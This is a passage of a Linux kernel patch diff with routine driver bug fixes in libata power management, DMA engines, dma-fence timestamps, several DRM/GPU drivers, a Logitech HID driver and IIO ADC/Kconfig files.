+@@ -750,6 +776,8 @@ void ata_scsi_port_error_handler(struct Scsi_Host *host, struct ata_port *ap)
+ 	/* clean up */
+ 	spin_lock_irqsave(ap->lock, flags);
+ 
++	ap->pflags &= ~ATA_PFLAG_RESUMING;
++
+ 	if (ap->pflags & ATA_PFLAG_LOADING)
+ 		ap->pflags &= ~ATA_PFLAG_LOADING;
+ 	else if ((ap->pflags & ATA_PFLAG_SCSI_HOTPLUG) &&
+@@ -1241,6 +1269,13 @@ void ata_eh_detach_dev(struct ata_device *dev)
+ 	struct ata_eh_context *ehc = &link->eh_context;
+ 	unsigned long flags;
+ 
++	/*
++	 * If the device is still enabled, transition it to standby power mode
++	 * (i.e. spin down HDDs).
++	 */
++	if (ata_dev_enabled(dev))
++		ata_dev_power_set_standby(dev);
++
+ 	ata_dev_disable(dev);
+ 
+ 	spin_lock_irqsave(ap->lock, flags);
+@@ -2927,6 +2962,15 @@ static int ata_eh_revalidate_and_attach(struct ata_link *link,
+ 		if (ehc->i.flags & ATA_EHI_DID_RESET)
+ 			readid_flags |= ATA_READID_POSTRESET;
+ 
++		/*
++		 * When resuming, before executing any command, make sure to
++		 * transition the device to the active power mode.
++		 */
++		if ((action & ATA_EH_SET_ACTIVE) && ata_dev_enabled(dev)) {
++			ata_dev_power_set_active(dev);
++			ata_eh_done(link, dev, ATA_EH_SET_ACTIVE);
++		}
++
+ 		if ((action & ATA_EH_REVALIDATE) && ata_dev_enabled(dev)) {
+ 			WARN_ON(dev->class == ATA_DEV_PMP);
+ 
+@@ -3886,6 +3930,7 @@ static void ata_eh_handle_port_suspend(struct ata_port *ap)
+ 	unsigned long flags;
+ 	int rc = 0;
+ 	struct ata_device *dev;
++	struct ata_link *link;
+ 
+ 	/* are we suspending? */
+ 	spin_lock_irqsave(ap->lock, flags);
+@@ -3898,6 +3943,12 @@ static void ata_eh_handle_port_suspend(struct ata_port *ap)
+ 
+ 	WARN_ON(ap->pflags & ATA_PFLAG_SUSPENDED);
+ 
++	/* Set all devices attached to the port in standby mode */
++	ata_for_each_link(link, ap, HOST_FIRST) {
++		ata_for_each_dev(dev, link, ENABLED)
++			ata_dev_power_set_standby(dev);
++	}
++
+ 	/*
+ 	 * If we have a ZPODD attached, check its zero
+ 	 * power ready status before the port is frozen.
+@@ -3980,6 +4031,7 @@ static void ata_eh_handle_port_resume(struct ata_port *ap)
+ 	/* update the flags */
+ 	spin_lock_irqsave(ap->lock, flags);
+ 	ap->pflags &= ~(ATA_PFLAG_PM_PENDING | ATA_PFLAG_SUSPENDED);
++	ap->pflags |= ATA_PFLAG_RESUMING;
+ 	spin_unlock_irqrestore(ap->lock, flags);
+ }
+ #endif /* CONFIG_PM */
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 7b9c9264b9a72..2b9676416b8e8 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1081,15 +1081,13 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 		}
+ 	} else {
+ 		sdev->sector_size = ata_id_logical_sector_size(dev->id);
++
+ 		/*
+-		 * Stop the drive on suspend but do not issue START STOP UNIT
+-		 * on resume as this is not necessary and may fail: the device
+-		 * will be woken up by ata_port_pm_resume() with a port reset
+-		 * and device revalidation.
++		 * Ask the sd driver to issue START STOP UNIT on runtime suspend
++		 * and resume only. For system level suspend/resume, devices
++		 * power state is handled directly by libata EH.
+ 		 */
+-		sdev->manage_system_start_stop = true;
+ 		sdev->manage_runtime_start_stop = true;
+-		sdev->no_start_on_resume = 1;
+ 	}
+ 
+ 	/*
+@@ -1265,7 +1263,7 @@ static unsigned int ata_scsi_start_stop_xlat(struct ata_queued_cmd *qc)
+ 	}
+ 
+ 	if (cdb[4] & 0x1) {
+-		tf->nsect = 1;	/* 1 sector, lba=0 */
++		tf->nsect = 1;  /* 1 sector, lba=0 */
+ 
+ 		if (qc->dev->flags & ATA_DFLAG_LBA) {
+ 			tf->flags |= ATA_TFLAG_LBA;
+@@ -1281,7 +1279,7 @@ static unsigned int ata_scsi_start_stop_xlat(struct ata_queued_cmd *qc)
+ 			tf->lbah = 0x0; /* cyl high */
+ 		}
+ 
+-		tf->command = ATA_CMD_VERIFY;	/* READ VERIFY */
++		tf->command = ATA_CMD_VERIFY;   /* READ VERIFY */
+ 	} else {
+ 		/* Some odd clown BIOSen issue spindown on power off (ACPI S4
+ 		 * or S5) causing some drives to spin up and down again.
+@@ -1291,7 +1289,7 @@ static unsigned int ata_scsi_start_stop_xlat(struct ata_queued_cmd *qc)
+ 			goto skip;
+ 
+ 		if ((qc->ap->flags & ATA_FLAG_NO_HIBERNATE_SPINDOWN) &&
+-		     system_entering_hibernation())
++		    system_entering_hibernation())
+ 			goto skip;
+ 
+ 		/* Issue ATA STANDBY IMMEDIATE command */
+diff --git a/drivers/ata/libata.h b/drivers/ata/libata.h
+index e5ec197aed303..a5e0e676ed9a8 100644
+--- a/drivers/ata/libata.h
++++ b/drivers/ata/libata.h
+@@ -62,6 +62,8 @@ extern int ata_dev_reread_id(struct ata_device *dev, unsigned int readid_flags);
+ extern int ata_dev_revalidate(struct ata_device *dev, unsigned int new_class,
+ 			      unsigned int readid_flags);
+ extern int ata_dev_configure(struct ata_device *dev);
++extern void ata_dev_power_set_standby(struct ata_device *dev);
++extern void ata_dev_power_set_active(struct ata_device *dev);
+ extern int sata_down_spd_limit(struct ata_link *link, u32 spd_limit);
+ extern int ata_down_xfermask_limit(struct ata_device *dev, unsigned int sel);
+ extern unsigned int ata_dev_set_feature(struct ata_device *dev,
+diff --git a/drivers/counter/counter-chrdev.c b/drivers/counter/counter-chrdev.c
+index 80acdf62794a3..afc94d0062b17 100644
+--- a/drivers/counter/counter-chrdev.c
++++ b/drivers/counter/counter-chrdev.c
+@@ -247,8 +247,8 @@ static int counter_get_ext(const struct counter_comp *const ext,
+ 		if (*id == component_id)
+ 			return 0;
+ 
+-		if (ext->type == COUNTER_COMP_ARRAY) {
+-			element = ext->priv;
++		if (ext[*ext_idx].type == COUNTER_COMP_ARRAY) {
++			element = ext[*ext_idx].priv;
+ 
+ 			if (component_id - *id < element->length)
+ 				return 0;
+diff --git a/drivers/counter/microchip-tcb-capture.c b/drivers/counter/microchip-tcb-capture.c
+index e2d1dc6ca6682..c7af13aca36cf 100644
+--- a/drivers/counter/microchip-tcb-capture.c
++++ b/drivers/counter/microchip-tcb-capture.c
+@@ -98,7 +98,7 @@ static int mchp_tc_count_function_write(struct counter_device *counter,
+ 		priv->qdec_mode = 0;
+ 		/* Set highest rate based on whether soc has gclk or not */
+ 		bmr &= ~(ATMEL_TC_QDEN | ATMEL_TC_POSEN);
+-		if (priv->tc_cfg->has_gclk)
++		if (!priv->tc_cfg->has_gclk)
+ 			cmr |= ATMEL_TC_TIMER_CLOCK2;
+ 		else
+ 			cmr |= ATMEL_TC_TIMER_CLOCK1;
+diff --git a/drivers/dma-buf/dma-fence-unwrap.c b/drivers/dma-buf/dma-fence-unwrap.c
+index c625bb2b5d563..628af51c81af3 100644
+--- a/drivers/dma-buf/dma-fence-unwrap.c
++++ b/drivers/dma-buf/dma-fence-unwrap.c
+@@ -76,16 +76,11 @@ struct dma_fence *__dma_fence_unwrap_merge(unsigned int num_fences,
+ 		dma_fence_unwrap_for_each(tmp, &iter[i], fences[i]) {
+ 			if (!dma_fence_is_signaled(tmp)) {
+ 				++count;
+-			} else if (test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT,
+-					    &tmp->flags)) {
+-				if (ktime_after(tmp->timestamp, timestamp))
+-					timestamp = tmp->timestamp;
+ 			} else {
+-				/*
+-				 * Use the current time if the fence is
+-				 * currently signaling.
+-				 */
+-				timestamp = ktime_get();
++				ktime_t t = dma_fence_timestamp(tmp);
++
++				if (ktime_after(t, timestamp))
++					timestamp = t;
+ 			}
+ 		}
+ 	}
+diff --git a/drivers/dma-buf/sync_file.c b/drivers/dma-buf/sync_file.c
+index af57799c86cee..2e9a316c596a3 100644
+--- a/drivers/dma-buf/sync_file.c
++++ b/drivers/dma-buf/sync_file.c
+@@ -268,13 +268,10 @@ static int sync_fill_fence_info(struct dma_fence *fence,
+ 		sizeof(info->driver_name));
+ 
+ 	info->status = dma_fence_get_status(fence);
+-	while (test_bit(DMA_FENCE_FLAG_SIGNALED_BIT, &fence->flags) &&
+-	       !test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT, &fence->flags))
+-		cpu_relax();
+ 	info->timestamp_ns =
+-		test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT, &fence->flags) ?
+-		ktime_to_ns(fence->timestamp) :
+-		ktime_set(0, 0);
++		dma_fence_is_signaled(fence) ?
++			ktime_to_ns(dma_fence_timestamp(fence)) :
++			ktime_set(0, 0);
+ 
+ 	return info->status;
+ }
+diff --git a/drivers/dma/idxd/device.c b/drivers/dma/idxd/device.c
+index 3b4ad7739f9ee..188f6b8625f78 100644
+--- a/drivers/dma/idxd/device.c
++++ b/drivers/dma/idxd/device.c
+@@ -495,6 +495,7 @@ static void idxd_cmd_exec(struct idxd_device *idxd, int cmd_code, u32 operand,
+ 	union idxd_command_reg cmd;
+ 	DECLARE_COMPLETION_ONSTACK(done);
+ 	u32 stat;
++	unsigned long flags;
+ 
+ 	if (idxd_device_is_halted(idxd)) {
+ 		dev_warn(&idxd->pdev->dev, "Device is HALTED!\n");
+@@ -508,7 +509,7 @@ static void idxd_cmd_exec(struct idxd_device *idxd, int cmd_code, u32 operand,
+ 	cmd.operand = operand;
+ 	cmd.int_req = 1;
+ 
+-	spin_lock(&idxd->cmd_lock);
++	spin_lock_irqsave(&idxd->cmd_lock, flags);
+ 	wait_event_lock_irq(idxd->cmd_waitq,
+ 			    !test_bit(IDXD_FLAG_CMD_RUNNING, &idxd->flags),
+ 			    idxd->cmd_lock);
+@@ -525,7 +526,7 @@ static void idxd_cmd_exec(struct idxd_device *idxd, int cmd_code, u32 operand,
+ 	 * After command submitted, release lock and go to sleep until
+ 	 * the command completes via interrupt.
+ 	 */
+-	spin_unlock(&idxd->cmd_lock);
++	spin_unlock_irqrestore(&idxd->cmd_lock, flags);
+ 	wait_for_completion(&done);
+ 	stat = ioread32(idxd->reg_base + IDXD_CMDSTS_OFFSET);
+ 	spin_lock(&idxd->cmd_lock);
+diff --git a/drivers/dma/mediatek/mtk-uart-apdma.c b/drivers/dma/mediatek/mtk-uart-apdma.c
+index a1517ef1f4a01..0acf6a92a4ad3 100644
+--- a/drivers/dma/mediatek/mtk-uart-apdma.c
++++ b/drivers/dma/mediatek/mtk-uart-apdma.c
+@@ -451,9 +451,8 @@ static int mtk_uart_apdma_device_pause(struct dma_chan *chan)
+ 	mtk_uart_apdma_write(c, VFF_EN, VFF_EN_CLR_B);
+ 	mtk_uart_apdma_write(c, VFF_INT_EN, VFF_INT_EN_CLR_B);
+ 
+-	synchronize_irq(c->irq);
+-
+ 	spin_unlock_irqrestore(&c->vc.lock, flags);
++	synchronize_irq(c->irq);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/dma/stm32-dma.c b/drivers/dma/stm32-dma.c
+index 37674029cb427..592d48ecf241f 100644
+--- a/drivers/dma/stm32-dma.c
++++ b/drivers/dma/stm32-dma.c
+@@ -1113,8 +1113,10 @@ static struct dma_async_tx_descriptor *stm32_dma_prep_slave_sg(
+ 		chan->chan_reg.dma_scr &= ~STM32_DMA_SCR_PFCTRL;
+ 
+ 	/* Activate Double Buffer Mode if DMA triggers STM32 MDMA and more than 1 sg */
+-	if (chan->trig_mdma && sg_len > 1)
++	if (chan->trig_mdma && sg_len > 1) {
+ 		chan->chan_reg.dma_scr |= STM32_DMA_SCR_DBM;
++		chan->chan_reg.dma_scr &= ~STM32_DMA_SCR_CT;
++	}
+ 
+ 	for_each_sg(sgl, sg, sg_len, i) {
+ 		ret = stm32_dma_set_xfer_param(chan, direction, &buswidth,
+@@ -1387,11 +1389,12 @@ static size_t stm32_dma_desc_residue(struct stm32_dma_chan *chan,
+ 
+ 	residue = stm32_dma_get_remaining_bytes(chan);
+ 
+-	if (chan->desc->cyclic && !stm32_dma_is_current_sg(chan)) {
++	if ((chan->desc->cyclic || chan->trig_mdma) && !stm32_dma_is_current_sg(chan)) {
+ 		n_sg++;
+ 		if (n_sg == chan->desc->num_sgs)
+ 			n_sg = 0;
+-		residue = sg_req->len;
++		if (!chan->trig_mdma)
++			residue = sg_req->len;
+ 	}
+ 
+ 	/*
+@@ -1401,7 +1404,7 @@ static size_t stm32_dma_desc_residue(struct stm32_dma_chan *chan,
+ 	 * residue = remaining bytes from NDTR + remaining
+ 	 * periods/sg to be transferred
+ 	 */
+-	if (!chan->desc->cyclic || n_sg != 0)
++	if ((!chan->desc->cyclic && !chan->trig_mdma) || n_sg != 0)
+ 		for (i = n_sg; i < desc->num_sgs; i++)
+ 			residue += desc->sg_req[i].len;
+ 
+diff --git a/drivers/dma/stm32-mdma.c b/drivers/dma/stm32-mdma.c
+index b9d4c843635fc..4e9bab61f4663 100644
+--- a/drivers/dma/stm32-mdma.c
++++ b/drivers/dma/stm32-mdma.c
+@@ -778,8 +778,6 @@ static int stm32_mdma_setup_xfer(struct stm32_mdma_chan *chan,
+ 	/* Enable interrupts */
+ 	ccr &= ~STM32_MDMA_CCR_IRQ_MASK;
+ 	ccr |= STM32_MDMA_CCR_TEIE | STM32_MDMA_CCR_CTCIE;
+-	if (sg_len > 1)
+-		ccr |= STM32_MDMA_CCR_BTIE;
+ 	desc->ccr = ccr;
+ 
+ 	return 0;
+@@ -1237,6 +1235,10 @@ static int stm32_mdma_resume(struct dma_chan *c)
+ 	unsigned long flags;
+ 	u32 status, reg;
+ 
++	/* Transfer can be terminated */
++	if (!chan->desc || (stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id)) & STM32_MDMA_CCR_EN))
++		return -EPERM;
++
+ 	hwdesc = chan->desc->node[chan->curr_hwdesc].hwdesc;
+ 
+ 	spin_lock_irqsave(&chan->vchan.lock, flags);
+@@ -1317,21 +1319,35 @@ static int stm32_mdma_slave_config(struct dma_chan *c,
+ 
+ static size_t stm32_mdma_desc_residue(struct stm32_mdma_chan *chan,
+ 				      struct stm32_mdma_desc *desc,
+-				      u32 curr_hwdesc)
++				      u32 curr_hwdesc,
++				      struct dma_tx_state *state)
+ {
+ 	struct stm32_mdma_device *dmadev = stm32_mdma_get_dev(chan);
+ 	struct stm32_mdma_hwdesc *hwdesc;
+-	u32 cbndtr, residue, modulo, burst_size;
++	u32 cisr, clar, cbndtr, residue, modulo, burst_size;
+ 	int i;
+ 
++	cisr = stm32_mdma_read(dmadev, STM32_MDMA_CISR(chan->id));
++
+ 	residue = 0;
+-	for (i = curr_hwdesc + 1; i < desc->count; i++) {
++	/* Get the next hw descriptor to process from current transfer */
++	clar = stm32_mdma_read(dmadev, STM32_MDMA_CLAR(chan->id));
++	for (i = desc->count - 1; i >= 0; i--) {
+ 		hwdesc = desc->node[i].hwdesc;
++
++		if (hwdesc->clar == clar)
++			break;/* Current transfer found, stop cumulating */
++
++		/* Cumulate residue of unprocessed hw descriptors */
+ 		residue += STM32_MDMA_CBNDTR_BNDT(hwdesc->cbndtr);
+ 	}
+ 	cbndtr = stm32_mdma_read(dmadev, STM32_MDMA_CBNDTR(chan->id));
+ 	residue += cbndtr & STM32_MDMA_CBNDTR_BNDT_MASK;
+ 
++	state->in_flight_bytes = 0;
++	if (chan->chan_config.m2m_hw && (cisr & STM32_MDMA_CISR_CRQA))
++		state->in_flight_bytes = cbndtr & STM32_MDMA_CBNDTR_BNDT_MASK;
++
+ 	if (!chan->mem_burst)
+ 		return residue;
+ 
+@@ -1361,11 +1377,10 @@ static enum dma_status stm32_mdma_tx_status(struct dma_chan *c,
+ 
+ 	vdesc = vchan_find_desc(&chan->vchan, cookie);
+ 	if (chan->desc && cookie == chan->desc->vdesc.tx.cookie)
+-		residue = stm32_mdma_desc_residue(chan, chan->desc,
+-						  chan->curr_hwdesc);
++		residue = stm32_mdma_desc_residue(chan, chan->desc, chan->curr_hwdesc, state);
+ 	else if (vdesc)
+-		residue = stm32_mdma_desc_residue(chan,
+-						  to_stm32_mdma_desc(vdesc), 0);
++		residue = stm32_mdma_desc_residue(chan, to_stm32_mdma_desc(vdesc), 0, state);
++
+ 	dma_set_residue(state, residue);
+ 
+ 	spin_unlock_irqrestore(&chan->vchan.lock, flags);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+index 93207badf83f3..6dcd7bab42fbb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+@@ -220,7 +220,7 @@ static inline bool amdgpu_bo_in_cpu_visible_vram(struct amdgpu_bo *bo)
+ 	struct amdgpu_device *adev = amdgpu_ttm_adev(bo->tbo.bdev);
+ 	struct amdgpu_res_cursor cursor;
+ 
+-	if (bo->tbo.resource->mem_type != TTM_PL_VRAM)
++	if (!bo->tbo.resource || bo->tbo.resource->mem_type != TTM_PL_VRAM)
+ 		return false;
+ 
+ 	amdgpu_res_first(bo->tbo.resource, 0, amdgpu_bo_size(bo), &cursor);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 16c05a24ac7aa..15d3caf3d6d72 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1183,6 +1183,9 @@ static void disable_vbios_mode_if_required(
+ 		if (stream == NULL)
+ 			continue;
+ 
++		if (stream->apply_seamless_boot_optimization)
++			continue;
++
+ 		// only looking for first odm pipe
+ 		if (pipe->prev_odm_pipe)
+ 			continue;
+diff --git a/drivers/gpu/drm/drm_atomic_helper.c b/drivers/gpu/drm/drm_atomic_helper.c
+index 202a9990f4517..b097bff1cd18e 100644
+--- a/drivers/gpu/drm/drm_atomic_helper.c
++++ b/drivers/gpu/drm/drm_atomic_helper.c
+@@ -290,7 +290,8 @@ static int
+ update_connector_routing(struct drm_atomic_state *state,
+ 			 struct drm_connector *connector,
+ 			 struct drm_connector_state *old_connector_state,
+-			 struct drm_connector_state *new_connector_state)
++			 struct drm_connector_state *new_connector_state,
++			 bool added_by_user)
+ {
+ 	const struct drm_connector_helper_funcs *funcs;
+ 	struct drm_encoder *new_encoder;
+@@ -339,9 +340,13 @@ update_connector_routing(struct drm_atomic_state *state,
+ 	 * there's a chance the connector may have been destroyed during the
+ 	 * process, but it's better to ignore that then cause
+ 	 * drm_atomic_helper_resume() to fail.
++	 *
++	 * Last, we want to ignore connector registration when the connector
++	 * was not pulled in the atomic state by user-space (ie, was pulled
++	 * in by the driver, e.g. when updating a DP-MST stream).
+ 	 */
+ 	if (!state->duplicated && drm_connector_is_unregistered(connector) &&
+-	    crtc_state->active) {
++	    added_by_user && crtc_state->active) {
+ 		drm_dbg_atomic(connector->dev,
+ 			       "[CONNECTOR:%d:%s] is not registered\n",
+ 			       connector->base.id, connector->name);
+@@ -620,7 +625,10 @@ drm_atomic_helper_check_modeset(struct drm_device *dev,
+ 	struct drm_connector *connector;
+ 	struct drm_connector_state *old_connector_state, *new_connector_state;
+ 	int i, ret;
+-	unsigned int connectors_mask = 0;
++	unsigned int connectors_mask = 0, user_connectors_mask = 0;
++
++	for_each_oldnew_connector_in_state(state, connector, old_connector_state, new_connector_state, i)
++		user_connectors_mask |= BIT(i);
+ 
+ 	for_each_oldnew_crtc_in_state(state, crtc, old_crtc_state, new_crtc_state, i) {
+ 		bool has_connectors =
+@@ -685,7 +693,8 @@ drm_atomic_helper_check_modeset(struct drm_device *dev,
+ 		 */
+ 		ret = update_connector_routing(state, connector,
+ 					       old_connector_state,
+-					       new_connector_state);
++					       new_connector_state,
++					       BIT(i) & user_connectors_mask);
+ 		if (ret)
+ 			return ret;
+ 		if (old_connector_state->crtc) {
+diff --git a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+index cc84685368715..efc22f9b17f07 100644
+--- a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+@@ -235,8 +235,17 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 		u32 flags = 0;
+ 		u32 *cs;
+ 
++		/*
++		 * L3 fabric flush is needed for AUX CCS invalidation
++		 * which happens as part of pipe-control so we can
++		 * ignore PIPE_CONTROL_FLUSH_L3. Also PIPE_CONTROL_FLUSH_L3
++		 * deals with Protected Memory which is not needed for
++		 * AUX CCS invalidation and lead to unwanted side effects.
++		 */
++		if (mode & EMIT_FLUSH)
++			flags |= PIPE_CONTROL_FLUSH_L3;
++
+ 		flags |= PIPE_CONTROL_TILE_CACHE_FLUSH;
+-		flags |= PIPE_CONTROL_FLUSH_L3;
+ 		flags |= PIPE_CONTROL_RENDER_TARGET_CACHE_FLUSH;
+ 		flags |= PIPE_CONTROL_DEPTH_CACHE_FLUSH;
+ 		/* Wa_1409600907:tgl,adl-p */
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+index 3fbda2a1f77fc..62d48c0f905e4 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+@@ -142,6 +142,7 @@ static void _dpu_plane_calc_bw(struct drm_plane *plane,
+ 	const struct dpu_format *fmt = NULL;
+ 	struct dpu_kms *dpu_kms = _dpu_plane_get_kms(plane);
+ 	int src_width, src_height, dst_height, fps;
++	u64 plane_pixel_rate, plane_bit_rate;
+ 	u64 plane_prefill_bw;
+ 	u64 plane_bw;
+ 	u32 hw_latency_lines;
+@@ -164,13 +165,12 @@ static void _dpu_plane_calc_bw(struct drm_plane *plane,
+ 	scale_factor = src_height > dst_height ?
+ 		mult_frac(src_height, 1, dst_height) : 1;
+ 
+-	plane_bw =
+-		src_width * mode->vtotal * fps * fmt->bpp *
+-		scale_factor;
++	plane_pixel_rate = src_width * mode->vtotal * fps;
++	plane_bit_rate = plane_pixel_rate * fmt->bpp;
+ 
+-	plane_prefill_bw =
+-		src_width * hw_latency_lines * fps * fmt->bpp *
+-		scale_factor * mode->vtotal;
++	plane_bw = plane_bit_rate * scale_factor;
++
++	plane_prefill_bw = plane_bw * hw_latency_lines;
+ 
+ 	if ((vbp+vpw) > hw_latency_lines)
+ 		do_div(plane_prefill_bw, (vbp+vpw));
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.c b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+index dd26ca651a054..103eef9f059a0 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.c
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+@@ -1711,13 +1711,6 @@ int dp_ctrl_on_link(struct dp_ctrl *dp_ctrl)
+ 		return rc;
+ 
+ 	while (--link_train_max_retries) {
+-		rc = dp_ctrl_reinitialize_mainlink(ctrl);
+-		if (rc) {
+-			DRM_ERROR("Failed to reinitialize mainlink. rc=%d\n",
+-					rc);
+-			break;
+-		}
+-
+ 		training_step = DP_TRAINING_NONE;
+ 		rc = dp_ctrl_setup_main_link(ctrl, &training_step);
+ 		if (rc == 0) {
+@@ -1769,6 +1762,12 @@ int dp_ctrl_on_link(struct dp_ctrl *dp_ctrl)
+ 			/* stop link training before start re training  */
+ 			dp_ctrl_clear_training_pattern(ctrl);
+ 		}
++
++		rc = dp_ctrl_reinitialize_mainlink(ctrl);
++		if (rc) {
++			DRM_ERROR("Failed to reinitialize mainlink. rc=%d\n", rc);
++			break;
++		}
+ 	}
+ 
+ 	if (ctrl->link->sink_request & DP_TEST_LINK_PHY_TEST_PATTERN)
+diff --git a/drivers/gpu/drm/msm/dp/dp_link.c b/drivers/gpu/drm/msm/dp/dp_link.c
+index 36bb6191d2f03..cb66d1126ea96 100644
+--- a/drivers/gpu/drm/msm/dp/dp_link.c
++++ b/drivers/gpu/drm/msm/dp/dp_link.c
+@@ -1068,7 +1068,7 @@ int dp_link_process_request(struct dp_link *dp_link)
+ 		}
+ 	}
+ 
+-	drm_dbg_dp(link->drm_dev, "sink request=%#x",
++	drm_dbg_dp(link->drm_dev, "sink request=%#x\n",
+ 				dp_link->sink_request);
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index b433ccfe4d7da..e20cd3dd2c6cc 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -1098,9 +1098,21 @@ static void dsi_wait4video_done(struct msm_dsi_host *msm_host)
+ 
+ static void dsi_wait4video_eng_busy(struct msm_dsi_host *msm_host)
+ {
++	u32 data;
++
+ 	if (!(msm_host->mode_flags & MIPI_DSI_MODE_VIDEO))
+ 		return;
+ 
++	data = dsi_read(msm_host, REG_DSI_STATUS0);
++
++	/* if video mode engine is not busy, its because
++	 * either timing engine was not turned on or the
++	 * DSI controller has finished transmitting the video
++	 * data already, so no need to wait in those cases
++	 */
++	if (!(data & DSI_STATUS0_VIDEO_MODE_ENGINE_BUSY))
++		return;
++
+ 	if (msm_host->power_on && msm_host->enabled) {
+ 		dsi_wait4video_done(msm_host);
+ 		/* delay 4 ms to skip BLLP */
+@@ -1960,10 +1972,9 @@ int msm_dsi_host_init(struct msm_dsi *msm_dsi)
+ 	}
+ 
+ 	msm_host->irq = irq_of_parse_and_map(pdev->dev.of_node, 0);
+-	if (msm_host->irq < 0) {
+-		ret = msm_host->irq;
+-		dev_err(&pdev->dev, "failed to get irq: %d\n", ret);
+-		return ret;
++	if (!msm_host->irq) {
++		dev_err(&pdev->dev, "failed to get irq\n");
++		return -EINVAL;
+ 	}
+ 
+ 	/* do not autoenable, will be enabled later */
+diff --git a/drivers/gpu/drm/scheduler/sched_main.c b/drivers/gpu/drm/scheduler/sched_main.c
+index e5a4ecde0063d..f138b3be1646f 100644
+--- a/drivers/gpu/drm/scheduler/sched_main.c
++++ b/drivers/gpu/drm/scheduler/sched_main.c
+@@ -841,7 +841,7 @@ drm_sched_get_cleanup_job(struct drm_gpu_scheduler *sched)
+ 
+ 		if (next) {
+ 			next->s_fence->scheduled.timestamp =
+-				job->s_fence->finished.timestamp;
++				dma_fence_timestamp(&job->s_fence->finished);
+ 			/* start TO timer for next job */
+ 			drm_sched_start_timeout(sched);
+ 		}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index 58ca9adf09871..7e59469e1cb9f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1614,7 +1614,7 @@ static int vmw_cmd_tex_state(struct vmw_private *dev_priv,
+ {
+ 	VMW_DECLARE_CMD_VAR(*cmd, SVGA3dCmdSetTextureState);
+ 	SVGA3dTextureState *last_state = (SVGA3dTextureState *)
+-	  ((unsigned long) header + header->size + sizeof(header));
++	  ((unsigned long) header + header->size + sizeof(*header));
+ 	SVGA3dTextureState *cur_state = (SVGA3dTextureState *)
+ 		((unsigned long) header + sizeof(*cmd));
+ 	struct vmw_resource *ctx;
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 97eefb77f6014..fb427391c3b86 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4275,7 +4275,8 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			goto hid_hw_init_fail;
+ 	}
+ 
+-	hidpp_connect_event(hidpp);
++	schedule_work(&hidpp->work);
++	flush_work(&hidpp->work);
+ 
+ 	if (will_restart) {
+ 		/* Reset the HID node state */
+diff --git a/drivers/iio/adc/imx8qxp-adc.c b/drivers/iio/adc/imx8qxp-adc.c
+index f5a0fc9e64c54..fff6e5a2d9569 100644
+--- a/drivers/iio/adc/imx8qxp-adc.c
++++ b/drivers/iio/adc/imx8qxp-adc.c
+@@ -38,8 +38,8 @@
+ #define IMX8QXP_ADR_ADC_FCTRL		0x30
+ #define IMX8QXP_ADR_ADC_SWTRIG		0x34
+ #define IMX8QXP_ADR_ADC_TCTRL(tid)	(0xc0 + (tid) * 4)
+-#define IMX8QXP_ADR_ADC_CMDH(cid)	(0x100 + (cid) * 8)
+-#define IMX8QXP_ADR_ADC_CMDL(cid)	(0x104 + (cid) * 8)
++#define IMX8QXP_ADR_ADC_CMDL(cid)	(0x100 + (cid) * 8)
++#define IMX8QXP_ADR_ADC_CMDH(cid)	(0x104 + (cid) * 8)
+ #define IMX8QXP_ADR_ADC_RESFIFO		0x300
+ #define IMX8QXP_ADR_ADC_TST		0xffc
+ 
+diff --git a/drivers/iio/addac/Kconfig b/drivers/iio/addac/Kconfig
+index fcf6d2269bfc2..3507cd6ab4e54 100644
+--- a/drivers/iio/addac/Kconfig
++++ b/drivers/iio/addac/Kconfig
+@@ -10,6 +10,8 @@ config AD74413R
+ 	depends on GPIOLIB && SPI
+ 	select REGMAP_SPI
+ 	select CRC8
++	select IIO_BUFFER
++	select IIO_TRIGGERED_BUFFER
+ 	help
+ 	  Say yes here to build support for Analog Devices AD74412R/AD74413R
+ 	  quad-channel software configurable input/output solution.
+diff --git a/drivers/iio/dac/ad3552r.c b/drivers/iio/dac/ad3552r.c
